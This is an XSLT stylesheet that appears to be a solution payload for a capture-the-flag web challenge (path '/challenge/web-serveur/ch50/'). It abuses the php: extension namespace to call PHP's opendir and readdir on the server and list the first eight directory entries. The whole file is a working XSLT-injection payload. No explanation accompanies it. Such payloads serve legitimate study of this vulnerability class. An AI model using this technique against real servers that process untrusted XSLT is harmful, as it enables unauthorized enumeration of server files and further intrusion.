<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
  <html>
  <body>
    <xsl:variable name="dir" select="php:function('opendir', '/challenge/web-serveur/ch50/')" />
    
    <ul>
      <li>1: <xsl:value-of select="php:function('readdir', $dir)" /></li>
      <li>2: <xsl:value-of select="php:function('readdir', $dir)" /></li>
      <li>3: <xsl:value-of select="php:function('readdir', $dir)" /></li>
      <li>4: <xsl:value-of select="php:function('readdir', $dir)" /></li>
      <li>5: <xsl:value-of select="php:function('readdir', $dir)" /></li>
      <li>6: <xsl:value-of select="php:function('readdir', $dir)" /></li>
      <li>7: <xsl:value-of select="php:function('readdir', $dir)" /></li>
      <li>8: <xsl:value-of select="php:function('readdir', $dir)" /></li>
    </ul>

    <xsl:value-of select="php:function('closedir', $dir)" />
  </body>
  </html>
</xsl:template>
</xsl:stylesheet>
